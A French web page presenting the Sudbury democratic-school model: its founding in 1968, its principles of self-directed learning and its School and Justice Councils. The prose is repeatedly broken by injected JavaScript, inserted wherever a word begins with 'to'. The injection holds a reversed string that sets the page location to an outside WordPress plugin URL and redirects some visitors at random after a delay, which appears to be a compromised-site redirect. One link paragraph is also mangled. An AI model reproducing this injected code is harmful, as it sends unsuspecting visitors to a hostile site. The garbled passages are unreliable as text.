Le modèle Sudbury

L’une des formes possibles des écoles démocratiques est le « modèle Sudbury ». C’est de ce modèle dont nous souhaitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons nous inspirer.

En 1968, Daniel et Hanna Greenberg fondent aux États-Unis dans le Massachussets la Sudbury Valley School. Cette école existe toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours aujourd’hui, 48 ans plus tard, avec plus de 200 élèves, de 4 à 19 ans et son modèle s’est essaimé dans le monde entier. Une cinquantaine d’écoles similaires existe aujourd’hui dans le monde.

Bien que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes uniques, elles vivent selon les mêmes principes : les élèves décident individuellement de ce qu’ils font de leur temps et leurs apprentissages sont le produit d’expériences ordinaires plutôt que de cours ou d’un programme standard. Ils et elles portent la toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totale responsabilité pour leur propre éducation et l’école est gérée par une démocratie directe dans laquelle les élèves et le personnel ont une voix égale.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonome.be/2016/07/13/principes-et-fondations-par-les-fondateurs-de-sudbury-valley-school/ » >en= » » cliquant= » » ici,= » » vous= » » pourrez= » » lire= » » le= » » témoignage= » » des= » » fondateurs= » » de= » » la= » » sudbury= » » valley= » » school= » » qui= » » expliquent= » » « pourquoi= » » cette= » » école »<="" a="">

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Dans une école Sudbury, on trouve :

  • le temps et l’espace pour le jeu et l’exploration
  • le libre mélange des âges
  • l’accès à des adultes compétents et bienveillants
  • l’accès à du matériel
  • le libre échange d’idées
  • l’absence de harcèlement scolaire
  • l’immersion dans des processus démocratiques

Communauté démocratique, une école Sudbury fonctionne avec 2 organes propres au modèle : le Conseil d’École et le Conseil de Justice. Le Conseil d’École, c’est l’instance de décision où chaque membre (enfants comme adultes) possède 1 voix. On y traite toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les sujets qui permettent le fonctionnement harmonieux de l’école (règles pour vivre-ensemble, décisions financières, projets, obligations administratives, etc.). Le Conseil de Justice, c’est l’instance qui garantit que les règles de l’école s’appliquent pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou-te-s de la même façon et qui font appliquer des sanctions éducatives dès qu’une personne enfreint une règle.

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